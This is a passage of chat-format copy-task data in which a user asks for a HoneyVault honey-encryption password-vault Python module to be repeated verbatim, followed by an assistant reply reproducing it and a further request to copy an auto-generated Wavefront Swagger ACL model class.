print_production(\"\\nAdding new passowrds..\\n\")\n for domain, pw in list(domain_pw_map.items()):\n i = self.get_domain_index(domain)\n print(\">>\", i, pw, domain)\n current_passwords[i] = pw\n self.S[i] = ndte.encode_pw(pw)\n self.machine_pass_set[i] = '0'\n\n # Cleaning the mess because of missed passwords\n # Because some password might have failed in copy_from_old_function, They need to be\n # re-encoded \n if new_encoding_of_old_pw:\n print_err(\"\\n<<<<<<\\nFixing Mess!!\\n{}>>>>>>>\".format(new_encoding_of_old_pw))\n nG.update_grammar(*[p for i, p in new_encoding_of_old_pw])\n for i, p in new_encoding_of_old_pw:\n self.S[i] = ndte.encode_pw(p)\n self.machine_pass_set[i] = '0'\n\n if hny_config.DEBUG:\n for i, pw_encodings in enumerate(self.S):\n if self.machine_pass_set[i] == '0':\n tpw = ndte.decode_pw(pw_encodings)\n tpwold = current_passwords[i]\n assert len(tpwold) <= 0 or tpw == tpwold, \\\n \"The re-encoding is faulty. Expecting: '{}' at {}. Got '{}'.\".format(tpwold, i, tpw)\n try:\n self.H = self.pcfg.encode_grammar(nG)\n except ValueError as ex:\n print(ex)\n print(\"Sorry the grammar is not complete enough to encode your \"\n \"passwords. This error will be fixed in future.\")\n exit(-1)\n self.dte = ndte\n\n def get_password(self, domain_list, send_raw=False):\n pw_list = []\n r_dte = DTE_random()\n for d in domain_list:\n i = self.get_domain_index(d)\n if self.machine_pass_set[i] == '1':\n pw = r_dte.decode_pw(self.S[i])\n else:\n pw = self.dte.decode_pw(self.S[i])\n pw_list.append(pw)\n return OrderedDict(list(zip(domain_list, pw_list)))\n\n def get_sample_decoding(self):\n \"\"\"\n check some of the sample decoding to make sure you are\n not accidentally spoiling the vault\n \"\"\"\n assert all(len(self.S[i]) == hny_config.PASSWORD_LENGTH for i in self.sample), \\\n \"Corrupted Encoding!!\"\n return [self.dte.decode_pw(self.S[i]) for i in self.sample]\n\n def get_all_pass(self):\n \"\"\"\n Returns all the passwords in the vault.\n \"\"\"\n r_dte = DTE_random()\n return ((i, self.dte.decode_pw(s)) if self.machine_pass_set[i] == '0' \\\n else (i, r_dte.decode_pw(s))\n for i, s in enumerate(self.S))\n\n def save(self, mp=None):\n if not mp:\n mp = self.mp\n with open(self.vault_fl, 'wb') as fvault:\n fvault.write(self.salt)\n buf = list(self.H[:])\n for i, a in enumerate(self.S):\n buf.extend(a)\n aes = do_crypto_setup(mp, self.salt)\n fvault.write(aes.encrypt(\n struct.pack('!%sI' % \\\n hny_config.HONEY_VAULT_ENCODING_SIZE,\n *buf))\n )\n for i in range(self.mpass_set_size):\n fvault.write(struct.pack('!B', int(\n ''.join(self.machine_pass_set[i * 8:(i + 1) * 8]), 2)))\n\n def load(self, mp):\n with open(self.vault_fl, 'rb') as fvault:\n self.salt = fvault.read(8)\n size_of_int = struct.calcsize('I')\n aes = do_crypto_setup(mp, self.salt)\n buf = aes.decrypt(\n fvault.read(hny_config.HONEY_VAULT_ENCODING_SIZE * size_of_int))\n t_s = struct.unpack(\n '!%sI' % hny_config.HONEY_VAULT_ENCODING_SIZE, buf)\n self.H = t_s[:hny_config.HONEY_VAULT_GRAMMAR_SIZE]\n t_s = t_s[hny_config.HONEY_VAULT_GRAMMAR_SIZE:]\n self.S = [t_s[i * hny_config.PASSWORD_LENGTH:(i + 1) * hny_config.PASSWORD_LENGTH]\n for i in range(self.s)]\n buf = fvault.read(self.mpass_set_size)\n self.machine_pass_set = \\\n list(''.join([\"{0:08b}\".format(x)\n for x in struct.unpack(\n \"%sB\" % self.mpass_set_size, buf)]))\n assert len(self.machine_pass_set) >= len(self.S)\n\n\n# ----------------------------------------------------------------------\n\ndef main():\n if len(sys.argv) < 5 or sys.argv[0] in ['-h', '--help']:\n print('''Taste the HoneyVault1.1 - a New Password Encrypting paradigm! \n|| Encrypt with confidence ||\n--encode vault_plain.txt masterpassword vault_cipher.txt\n--decode vault_cipher.txt masterpassword stdout\n ''')\n else:\n f1 = sys.argv[2]\n mp = sys.argv[3]\n f2 = sys.argv[4]\n if sys.argv[1] == '--encode':\n vault = [l.strip().split(',')[2] for l in open(f1) if l[0] != '#']\n cipher = vault_encrypt(vault, mp)\n with open(f2, 'wb') as outf:\n n = len(vault)\n outf.write(struct.pack('<I', n))\n outf.write(cipher)\n print(\"Your Vault is encrypted! Now you can delte the plaintext vault text.\")\n elif sys.argv[1] == '--decode':\n dt = open(f1, 'rb').read()\n n = struct.unpack('<I', dt[:4])[0]\n vault = vault_decrypt(dt[4:], mp, n)\n print(vault)\n else:\n print(\"Sorry Anthofila! Command not recognised.\")\n\n\nif __name__ == \"__main__\":\n print(\"TODO: add main/test\")\n main()\n```\nRepeat the code exactly as written.",
"role": "user"
}
] |
[
{
"content": "<|memory_start|>```python\nimport json\nimport math\nimport os\nimport sys\n\nBASE_DIR = os.getcwd()\nsys.path.append(BASE_DIR)\nfrom .honey_enc import DTE, DTE_random\nfrom pcfg.pcfg import TrainedGrammar\nimport honeyvault_config as hny_config\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256\nfrom Crypto.Protocol.KDF import PBKDF1\nfrom Crypto.Util import Counter\nimport copy, struct\nfrom helper import (open_, print_err, process_parallel, random,\n print_production)\nfrom pcfg.pcfg import VaultDistPCFG\nfrom collections import OrderedDict\n\n# from IPython.core import ultratb\n# sys.excepthook = ultratb.FormattedTB(color_scheme='Linux', call_pdb=1)\n\nMAX_INT = hny_config.MAX_INT\n\n\n# -------------------------------------------------------------------------------\ndef do_crypto_setup(mp, salt):\n key = PBKDF1(mp, salt, 16, 100, SHA256)\n ctr = Counter.new(128, initial_value=int(254))\n aes = AES.new(key, AES.MODE_CTR, counter=ctr)\n return aes\n\n\ndef copy_from_old_parallel(args):\n odte, ndte, i, p = args\n ret = []\n pw = odte.decode_pw(p)\n if not pw:\n return i, pw, []\n ret = ndte.encode_pw(pw)\n if not ret:\n print(\"Cool I failed in encoding!! Kudos to me. pw: {}, i: {}\"\n .format(pw, i))\n ret = pw\n else:\n tpw = ndte.decode_pw(ret)\n assert pw == tpw, \"Encoding-Decoding password is wrong. Expecting {!r}, got {!r}\"\\\n .format(pw, tpw)\n\n return i, pw, ret\n\n\nclass HoneyVault:\n s1 = hny_config.HONEY_VAULT_S1\n s2 = hny_config.HONEY_VAULT_S2\n s_g = hny_config.HONEY_VAULT_GRAMMAR_SIZE\n s = hny_config.HONEY_VAULT_STORAGE_SIZE\n vault_total_size = hny_config.HONEY_VAULT_ENCODING_SIZE\n sample = [10, 19, 20, 31]\n mpass_set_size = hny_config.HONEY_VAULT_MACHINE_PASS_SET_SIZE\n\n def __init__(self, vault_fl, mp):\n self.pcfg = TrainedGrammar() # Default large trained PCFG\n domain_hash_map_fl = hny_config.STATIC_DOMAIN_HASH_LIST\n self.domain_hash_map = json.load(open_(domain_hash_map_fl))\n self.vault_fl = vault_fl\n self.mp = mp\n self.initialize_vault(mp)\n self.dte = DTE(self.pcfg.decode_grammar(self.H))\n\n def get_domain_index(self, d):\n h = SHA256.new()\n h.update(d.encode('utf-8'))\n d_hash = h.hexdigest()[:32]\n try:\n i = self.domain_hash_map[d_hash]\n if i > self.s1:\n raise KeyError\n else:\n return i\n except KeyError:\n sys.stderr.write('WARNING! S1 miss for %s\\n' % d)\n x = struct.unpack('8I', h.digest())[0]\n return self.s1 + x % self.s2\n\n def initialize_vault(self, mp):\n vd = VaultDistPCFG()\n if not os.path.exists(self.vault_fl):\n print_production(\"\\nCould not find the vault file @ {}, so, sit tight, \" \\\n \"creating a dummy vault for you.\" \\\n \"\\nShould not take too long...\\n\".format(self.vault_fl))\n t_s = random.randints(0, MAX_INT, hny_config.HONEY_VAULT_ENCODING_SIZE)\n self.H = t_s[:hny_config.HONEY_VAULT_GRAMMAR_SIZE]\n t_s = t_s[hny_config.HONEY_VAULT_GRAMMAR_SIZE:]\n self.S = [t_s[i:i + hny_config.PASSWORD_LENGTH]\n for i in range(0, self.s * hny_config.PASSWORD_LENGTH, hny_config.PASSWORD_LENGTH)]\n assert all(len(s) == hny_config.PASSWORD_LENGTH for s in\n self.S), \"All passwords encodings are not of correct length.\\n {}\".format(\n (len(s), hny_config.PASSWORD_LENGTH) for s in self.S)\n self.machine_pass_set = list('0' * (self.mpass_set_size * 8))\n k = int(math.ceil(hny_config.HONEY_VAULT_STORAGE_SIZE * \\\n hny_config.MACHINE_GENRATED_PASS_PROB / 1000.0))\n for i in random.sample(list(range(hny_config.HONEY_VAULT_STORAGE_SIZE)), k):\n self.machine_pass_set[i] = '1'\n self.salt = os.urandom(8)\n self.save(mp)\n else:\n self.load(mp)\n\n def gen_password(self, mp, domain_list, size=10):\n \"\"\"\n generates random password strings for each of the domail\n specified, and saves it in corresponding location.\n Master password (@mp) is required for that.\n \"\"\"\n r_dte = DTE_random()\n reply = []\n for d in domain_list:\n i = self.get_domain_index(d)\n p, encoding = r_dte.generate_and_encode_password(size)\n self.S[i] = encoding\n self.machine_pass_set[i] = '1'\n reply.append(p)\n self.save()\n return OrderedDict(list(zip(domain_list, reply)))\n\n def add_password(self, domain_pw_map):\n # print self.dte.G\n nG = copy.deepcopy(self.dte.G)\n print_production(\"Updating the grammar with new passwords..\")\n nG.update_grammar(*(list(domain_pw_map.values())))\n ndte = DTE(nG)\n\n # TODO: fix this, currently its a hack to way around my bad\n # parsing. A password can be generated in a different way than it is parsed in most probable\n # way. The code is supposed to pick one parse tree at random. Currently picking the most \n # probable one. Need to fix for security reason. Will add a ticket. \n new_encoding_of_old_pw = []\n\n current_passwords = ['' for _ in range(hny_config.HONEY_VAULT_STORAGE_SIZE)]\n\n if self.dte and (ndte != self.dte):\n # if new dte is different then copy the existing human chosen passwords. \n # Machine generated passwords are not necessary to re-encode. As their grammar\n # does not change. NEED TO CHECK SECURITY.\n print_production(\"Some new rules found, so adding them to the new grammar. \" \\\n \"Should not take too long...\\n\")\n data = [(self.dte, ndte, i, p)\n for i, p in enumerate(self.S)\n if self.machine_pass_set[i] == '0']\n if hny_config.DEBUG:\n result = map(copy_from_old_parallel, data)\n else:\n result = process_parallel(copy_from_old_parallel, data, func_load=100)\n\n for i, pw, pw_encodings in result:\n if isinstance(pw_encodings, str):\n new_encoding_of_old_pw.append((i, pw_encodings))\n current_passwords[i] = pw\n self.S[i] = pw_encodings\n\n # print_err(self.H[:10])\n # G_ = self.pcfg.decode_grammar(self.H)\n # print_err(\"-\"*50)\n # print_err(\"Original: \", nG, '\\n', '='*50)\n # print_err(\"After Decoding:\", G_)\n # assert G_ == nG\n\n print_production(\"\\nAdding new passowrds..\\n\")\n for domain, pw in list(domain_pw_map.items()):\n i = self.get_domain_index(domain)\n print(\">>\", i, pw, domain)\n current_passwords[i] = pw\n self.S[i] = ndte.encode_pw(pw)\n self.machine_pass_set[i] = '0'\n\n # Cleaning the mess because of missed passwords\n # Because some password might have failed in copy_from_old_function, They need to be\n # re-encoded \n if new_encoding_of_old_pw:\n print_err(\"\\n<<<<<<\\nFixing Mess!!\\n{}>>>>>>>\".format(new_encoding_of_old_pw))\n nG.update_grammar(*[p for i, p in new_encoding_of_old_pw])\n for i, p in new_encoding_of_old_pw:\n self.S[i] = ndte.encode_pw(p)\n self.machine_pass_set[i] = '0'\n\n if hny_config.DEBUG:\n for i, pw_encodings in enumerate(self.S):\n if self.machine_pass_set[i] == '0':\n tpw = ndte.decode_pw(pw_encodings)\n tpwold = current_passwords[i]\n assert len(tpwold) <= 0 or tpw == tpwold, \\\n \"The re-encoding is faulty. Expecting: '{}' at {}. Got '{}'.\".format(tpwold, i, tpw)\n try:\n self.H = self.pcfg.encode_grammar(nG)\n except ValueError as ex:\n print(ex)\n print(\"Sorry the grammar is not complete enough to encode your \"\n \"passwords. This error will be fixed in future.\")\n exit(-1)\n self.dte = ndte\n\n def get_password(self, domain_list, send_raw=False):\n pw_list = []\n r_dte = DTE_random()\n for d in domain_list:\n i = self.get_domain_index(d)\n if self.machine_pass_set[i] == '1':\n pw = r_dte.decode_pw(self.S[i])\n else:\n pw = self.dte.decode_pw(self.S[i])\n pw_list.append(pw)\n return OrderedDict(list(zip(domain_list, pw_list)))\n\n def get_sample_decoding(self):\n \"\"\"\n check some of the sample decoding to make sure you are\n not accidentally spoiling the vault\n \"\"\"\n assert all(len(self.S[i]) == hny_config.PASSWORD_LENGTH for i in self.sample), \\\n \"Corrupted Encoding!!\"\n return [self.dte.decode_pw(self.S[i]) for i in self.sample]\n\n def get_all_pass(self):\n \"\"\"\n Returns all the passwords in the vault.\n \"\"\"\n r_dte = DTE_random()\n return ((i, self.dte.decode_pw(s)) if self.machine_pass_set[i] == '0' \\\n else (i, r_dte.decode_pw(s))\n for i, s in enumerate(self.S))\n\n def save(self, mp=None):\n if not mp:\n mp = self.mp\n with open(self.vault_fl, 'wb') as fvault:\n fvault.write(self.salt)\n buf = list(self.H[:])\n for i, a in enumerate(self.S):\n buf.extend(a)\n aes = do_crypto_setup(mp, self.salt)\n fvault.write(aes.encrypt(\n struct.pack('!%sI' % \\\n hny_config.HONEY_VAULT_ENCODING_SIZE,\n *buf))\n )\n for i in range(self.mpass_set_size):\n fvault.write(struct.pack('!B', int(\n ''.join(self.machine_pass_set[i * 8:(i + 1) * 8]), 2)))\n\n def load(self, mp):\n with open(self.vault_fl, 'rb') as fvault:\n self.salt = fvault.read(8)\n size_of_int = struct.calcsize('I')\n aes = do_crypto_setup(mp, self.salt)\n buf = aes.decrypt(\n fvault.read(hny_config.HONEY_VAULT_ENCODING_SIZE * size_of_int))\n t_s = struct.unpack(\n '!%sI' % hny_config.HONEY_VAULT_ENCODING_SIZE, buf)\n self.H = t_s[:hny_config.HONEY_VAULT_GRAMMAR_SIZE]\n t_s = t_s[hny_config.HONEY_VAULT_GRAMMAR_SIZE:]\n self.S = [t_s[i * hny_config.PASSWORD_LENGTH:(i + 1) * hny_config.PASSWORD_LENGTH]\n for i in range(self.s)]\n buf = fvault.read(self.mpass_set_size)\n self.machine_pass_set = \\\n list(''.join([\"{0:08b}\".format(x)\n for x in struct.unpack(\n \"%sB\" % self.mpass_set_size, buf)]))\n assert len(self.machine_pass_set) >= len(self.S)\n\n\n# ----------------------------------------------------------------------\n\ndef main():\n if len(sys.argv) < 5 or sys.argv[0] in ['-h', '--help']:\n print('''Taste the HoneyVault1.1 - a New Password Encrypting paradigm! \n|| Encrypt with confidence ||\n--encode vault_plain.txt masterpassword vault_cipher.txt\n--decode vault_cipher.txt masterpassword stdout\n ''')\n else:\n f1 = sys.argv[2]\n mp = sys.argv[3]\n f2 = sys.argv[4]\n if sys.argv[1] == '--encode':\n vault = [l.strip().split(',')[2] for l in open(f1) if l[0] != '#']\n cipher = vault_encrypt(vault, mp)\n with open(f2, 'wb') as outf:\n n = len(vault)\n outf.write(struct.pack('<I', n))\n outf.write(cipher)\n print(\"Your Vault is encrypted! Now you can delte the plaintext vault text.\")\n elif sys.argv[1] == '--decode':\n dt = open(f1, 'rb').read()\n n = struct.unpack('<I', dt[:4])[0]\n vault = vault_decrypt(dt[4:], mp, n)\n print(vault)\n else:\n print(\"Sorry Anthofila! Command not recognised.\")\n\n\nif __name__ == \"__main__\":\n print(\"TODO: add main/test\")\n main()\n```<|memory_end|>\nRepeat the code exactly as written.",
"role": "user"
}
] |
```python
import json
import math
import os
import sys
BASE_DIR = os.getcwd()
sys.path.append(BASE_DIR)
from .honey_enc import DTE, DTE_random
from pcfg.pcfg import TrainedGrammar
import honeyvault_config as hny_config
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from Crypto.Protocol.KDF import PBKDF1
from Crypto.Util import Counter
import copy, struct
from helper import (open_, print_err, process_parallel, random,
print_production)
from pcfg.pcfg import VaultDistPCFG
from collections import OrderedDict
# from IPython.core import ultratb
# sys.excepthook = ultratb.FormattedTB(color_scheme='Linux', call_pdb=1)
MAX_INT = hny_config.MAX_INT
# -------------------------------------------------------------------------------
def do_crypto_setup(mp, salt):
key = PBKDF1(mp, salt, 16, 100, SHA256)
ctr = Counter.new(128, initial_value=int(254))
aes = AES.new(key, AES.MODE_CTR, counter=ctr)
return aes
def copy_from_old_parallel(args):
odte, ndte, i, p = args
ret = []
pw = odte.decode_pw(p)
if not pw:
return i, pw, []
ret = ndte.encode_pw(pw)
if not ret:
print("Cool I failed in encoding!! Kudos to me. pw: {}, i: {}"
.format(pw, i))
ret = pw
else:
tpw = ndte.decode_pw(ret)
assert pw == tpw, "Encoding-Decoding password is wrong. Expecting {!r}, got {!r}"\
.format(pw, tpw)
return i, pw, ret
class HoneyVault:
s1 = hny_config.HONEY_VAULT_S1
s2 = hny_config.HONEY_VAULT_S2
s_g = hny_config.HONEY_VAULT_GRAMMAR_SIZE
s = hny_config.HONEY_VAULT_STORAGE_SIZE
vault_total_size = hny_config.HONEY_VAULT_ENCODING_SIZE
sample = [10, 19, 20, 31]
mpass_set_size = hny_config.HONEY_VAULT_MACHINE_PASS_SET_SIZE
def __init__(self, vault_fl, mp):
self.pcfg = TrainedGrammar() # Default large trained PCFG
domain_hash_map_fl = hny_config.STATIC_DOMAIN_HASH_LIST
self.domain_hash_map = json.load(open_(domain_hash_map_fl))
self.vault_fl = vault_fl
self.mp = mp
self.initialize_vault(mp)
self.dte = DTE(self.pcfg.decode_grammar(self.H))
def get_domain_index(self, d):
h = SHA256.new()
h.update(d.encode('utf-8'))
d_hash = h.hexdigest()[:32]
try:
i = self.domain_hash_map[d_hash]
if i > self.s1:
raise KeyError
else:
return i
except KeyError:
sys.stderr.write('WARNING! S1 miss for %s\n' % d)
x = struct.unpack('8I', h.digest())[0]
return self.s1 + x % self.s2
def initialize_vault(self, mp):
vd = VaultDistPCFG()
if not os.path.exists(self.vault_fl):
print_production("\nCould not find the vault file @ {}, so, sit tight, " \
"creating a dummy vault for you." \
"\nShould not take too long...\n".format(self.vault_fl))
t_s = random.randints(0, MAX_INT, hny_config.HONEY_VAULT_ENCODING_SIZE)
self.H = t_s[:hny_config.HONEY_VAULT_GRAMMAR_SIZE]
t_s = t_s[hny_config.HONEY_VAULT_GRAMMAR_SIZE:]
self.S = [t_s[i:i + hny_config.PASSWORD_LENGTH]
for i in range(0, self.s * hny_config.PASSWORD_LENGTH, hny_config.PASSWORD_LENGTH)]
assert all(len(s) == hny_config.PASSWORD_LENGTH for s in
self.S), "All passwords encodings are not of correct length.\n {}".format(
(len(s), hny_config.PASSWORD_LENGTH) for s in self.S)
self.machine_pass_set = list('0' * (self.mpass_set_size * 8))
k = int(math.ceil(hny_config.HONEY_VAULT_STORAGE_SIZE * \
hny_config.MACHINE_GENRATED_PASS_PROB / 1000.0))
for i in random.sample(list(range(hny_config.HONEY_VAULT_STORAGE_SIZE)), k):
self.machine_pass_set[i] = '1'
self.salt = os.urandom(8)
self.save(mp)
else:
self.load(mp)
def gen_password(self, mp, domain_list, size=10):
"""
generates random password strings for each of the domail
specified, and saves it in corresponding location.
Master password (@mp) is required for that.
"""
r_dte = DTE_random()
reply = []
for d in domain_list:
i = self.get_domain_index(d)
p, encoding = r_dte.generate_and_encode_password(size)
self.S[i] = encoding
self.machine_pass_set[i] = '1'
reply.append(p)
self.save()
return OrderedDict(list(zip(domain_list, reply)))
def add_password(self, domain_pw_map):
# print self.dte.G
nG = copy.deepcopy(self.dte.G)
print_production("Updating the grammar with new passwords..")
nG.update_grammar(*(list(domain_pw_map.values())))
ndte = DTE(nG)
# TODO: fix this, currently its a hack to way around my bad
# parsing. A password can be generated in a different way than it is parsed in most probable
# way. The code is supposed to pick one parse tree at random. Currently picking the most
# probable one. Need to fix for security reason. Will add a ticket.
new_encoding_of_old_pw = []
current_passwords = ['' for _ in range(hny_config.HONEY_VAULT_STORAGE_SIZE)]
if self.dte and (ndte != self.dte):
# if new dte is different then copy the existing human chosen passwords.
# Machine generated passwords are not necessary to re-encode. As their grammar
# does not change. NEED TO CHECK SECURITY.
print_production("Some new rules found, so adding them to the new grammar. " \
"Should not take too long...\n")
data = [(self.dte, ndte, i, p)
for i, p in enumerate(self.S)
if self.machine_pass_set[i] == '0']
if hny_config.DEBUG:
result = map(copy_from_old_parallel, data)
else:
result = process_parallel(copy_from_old_parallel, data, func_load=100)
for i, pw, pw_encodings in result:
if isinstance(pw_encodings, str):
new_encoding_of_old_pw.append((i, pw_encodings))
current_passwords[i] = pw
self.S[i] = pw_encodings
# print_err(self.H[:10])
# G_ = self.pcfg.decode_grammar(self.H)
# print_err("-"*50)
# print_err("Original: ", nG, '\n', '='*50)
# print_err("After Decoding:", G_)
# assert G_ == nG
print_production("\nAdding new passowrds..\n")
for domain, pw in list(domain_pw_map.items()):
i = self.get_domain_index(domain)
print(">>", i, pw, domain)
current_passwords[i] = pw
self.S[i] = ndte.encode_pw(pw)
self.machine_pass_set[i] = '0'
# Cleaning the mess because of missed passwords
# Because some password might have failed in copy_from_old_function, They need to be
# re-encoded
if new_encoding_of_old_pw:
print_err("\n<<<<<<\nFixing Mess!!\n{}>>>>>>>".format(new_encoding_of_old_pw))
nG.update_grammar(*[p for i, p in new_encoding_of_old_pw])
for i, p in new_encoding_of_old_pw:
self.S[i] = ndte.encode_pw(p)
self.machine_pass_set[i] = '0'
if hny_config.DEBUG:
for i, pw_encodings in enumerate(self.S):
if self.machine_pass_set[i] == '0':
tpw = ndte.decode_pw(pw_encodings)
tpwold = current_passwords[i]
assert len(tpwold) <= 0 or tpw == tpwold, \
"The re-encoding is faulty. Expecting: '{}' at {}. Got '{}'.".format(tpwold, i, tpw)
try:
self.H = self.pcfg.encode_grammar(nG)
except ValueError as ex:
print(ex)
print("Sorry the grammar is not complete enough to encode your "
"passwords. This error will be fixed in future.")
exit(-1)
self.dte = ndte
def get_password(self, domain_list, send_raw=False):
pw_list = []
r_dte = DTE_random()
for d in domain_list:
i = self.get_domain_index(d)
if self.machine_pass_set[i] == '1':
pw = r_dte.decode_pw(self.S[i])
else:
pw = self.dte.decode_pw(self.S[i])
pw_list.append(pw)
return OrderedDict(list(zip(domain_list, pw_list)))
def get_sample_decoding(self):
"""
check some of the sample decoding to make sure you are
not accidentally spoiling the vault
"""
assert all(len(self.S[i]) == hny_config.PASSWORD_LENGTH for i in self.sample), \
"Corrupted Encoding!!"
return [self.dte.decode_pw(self.S[i]) for i in self.sample]
def get_all_pass(self):
"""
Returns all the passwords in the vault.
"""
r_dte = DTE_random()
return ((i, self.dte.decode_pw(s)) if self.machine_pass_set[i] == '0' \
else (i, r_dte.decode_pw(s))
for i, s in enumerate(self.S))
def save(self, mp=None):
if not mp:
mp = self.mp
with open(self.vault_fl, 'wb') as fvault:
fvault.write(self.salt)
buf = list(self.H[:])
for i, a in enumerate(self.S):
buf.extend(a)
aes = do_crypto_setup(mp, self.salt)
fvault.write(aes.encrypt(
struct.pack('!%sI' % \
hny_config.HONEY_VAULT_ENCODING_SIZE,
*buf))
)
for i in range(self.mpass_set_size):
fvault.write(struct.pack('!B', int(
''.join(self.machine_pass_set[i * 8:(i + 1) * 8]), 2)))
def load(self, mp):
with open(self.vault_fl, 'rb') as fvault:
self.salt = fvault.read(8)
size_of_int = struct.calcsize('I')
aes = do_crypto_setup(mp, self.salt)
buf = aes.decrypt(
fvault.read(hny_config.HONEY_VAULT_ENCODING_SIZE * size_of_int))
t_s = struct.unpack(
'!%sI' % hny_config.HONEY_VAULT_ENCODING_SIZE, buf)
self.H = t_s[:hny_config.HONEY_VAULT_GRAMMAR_SIZE]
t_s = t_s[hny_config.HONEY_VAULT_GRAMMAR_SIZE:]
self.S = [t_s[i * hny_config.PASSWORD_LENGTH:(i + 1) * hny_config.PASSWORD_LENGTH]
for i in range(self.s)]
buf = fvault.read(self.mpass_set_size)
self.machine_pass_set = \
list(''.join(["{0:08b}".format(x)
for x in struct.unpack(
"%sB" % self.mpass_set_size, buf)]))
assert len(self.machine_pass_set) >= len(self.S)
# ----------------------------------------------------------------------
def main():
if len(sys.argv) < 5 or sys.argv[0] in ['-h', '--help']:
print('''Taste the HoneyVault1.1 - a New Password Encrypting paradigm!
|| Encrypt with confidence ||
--encode vault_plain.txt masterpassword vault_cipher.txt
--decode vault_cipher.txt masterpassword stdout
''')
else:
f1 = sys.argv[2]
mp = sys.argv[3]
f2 = sys.argv[4]
if sys.argv[1] == '--encode':
vault = [l.strip().split(',')[2] for l in open(f1) if l[0] != '#']
cipher = vault_encrypt(vault, mp)
with open(f2, 'wb') as outf:
n = len(vault)
outf.write(struct.pack('<I', n))
outf.write(cipher)
print("Your Vault is encrypted! Now you can delte the plaintext vault text.")
elif sys.argv[1] == '--decode':
dt = open(f1, 'rb').read()
n = struct.unpack('<I', dt[:4])[0]
vault = vault_decrypt(dt[4:], mp, n)
print(vault)
else:
print("Sorry Anthofila! Command not recognised.")
if __name__ == "__main__":
print("TODO: add main/test")
main()
```
|
[
{
"content": "Here is the snippet:\n```python\n# coding: utf-8\n\n\"\"\"\n Wavefront REST API\n\n <p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \\\"Authorization: Bearer <<API-TOKEN>>\\\" to your HTTP requests.</p> # noqa: E501\n\n OpenAPI spec version: v2\n Contact: [email protected]\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\n\nclass AccessControlListWriteDTO(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'entity_id': 'str',\n 'modify_acl': 'list[str]',\n 'view_acl': 'list[str]'\n }\n\n attribute_map = {\n 'entity_id': 'entityId',\n 'modify_acl': 'modifyAcl',\n 'view_acl': 'viewAcl'\n }\n\n def __init__(self, entity_id=None, modify_acl=None, view_acl=None): # noqa: E501\n \"\"\"AccessControlListWriteDTO - a model defined in Swagger\"\"\" # noqa: E501\n\n self._entity_id = None\n self._modify_acl = None\n self._view_acl = None\n self.discriminator = None\n\n if entity_id is not None:\n self.entity_id = entity_id\n if modify_acl is not None:\n self.modify_acl = modify_acl\n if view_acl is not None:\n self.view_acl = view_acl\n\n @property\n def entity_id(self):\n \"\"\"Gets the entity_id of this AccessControlListWriteDTO. # noqa: E501\n\n The entity Id # noqa: E501\n\n :return: The entity_id of this AccessControlListWriteDTO. # noqa: E501\n :rtype: str\n \"\"\"\n return self._entity_id\n\n @entity_id.setter\n def entity_id(self, entity_id):\n \"\"\"Sets the entity_id of this AccessControlListWriteDTO.\n\n The entity Id # noqa: E501\n\n :param entity_id: The entity_id of this AccessControlListWriteDTO. # noqa: E501\n :type: str\n \"\"\"\n\n self._entity_id = entity_id\n\n @property\n def modify_acl(self):\n \"\"\"Gets the modify_acl of this AccessControlListWriteDTO. # noqa: E501\n\n List of users and user groups ids that have modify permission # noqa: E501\n\n :return: The modify_acl of this AccessControlListWriteDTO. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._modify_acl\n\n @modify_acl.setter\n def modify_acl(self, modify_acl):\n \"\"\"Sets the modify_acl of this AccessControlListWriteDTO.\n\n List of users and user groups ids that have modify permission # noqa: E501\n\n :param modify_acl: The modify_acl of this AccessControlListWriteDTO. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._modify_acl = modify_acl\n\n @property\n def view_acl(self):\n \"\"\"Gets the view_acl of this AccessControlListWriteDTO. # noqa: E501\n\n List of users and user group ids that have view permission # noqa: E501\n\n :return: The view_acl of this AccessControlListWriteDTO. # noqa: E501\n :rtype: list[str]\n \"\"\"\n return self._view_acl\n\n @view_acl.setter\n def view_acl(self, view_acl):\n \"\"\"Sets the view_acl of this AccessControlListWriteDTO.\n\n List of users and user group ids that have view permission # noqa: E501\n\n :param view_acl: The view_acl of this AccessControlListWriteDTO. # noqa: E501\n :type: list[str]\n \"\"\"\n\n self._view_acl = view_acl\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(AccessControlListWriteDTO, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, AccessControlListWriteDTO):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n```\nOutput a verbatim copy.",
"role": "user"
}
] |
[
{
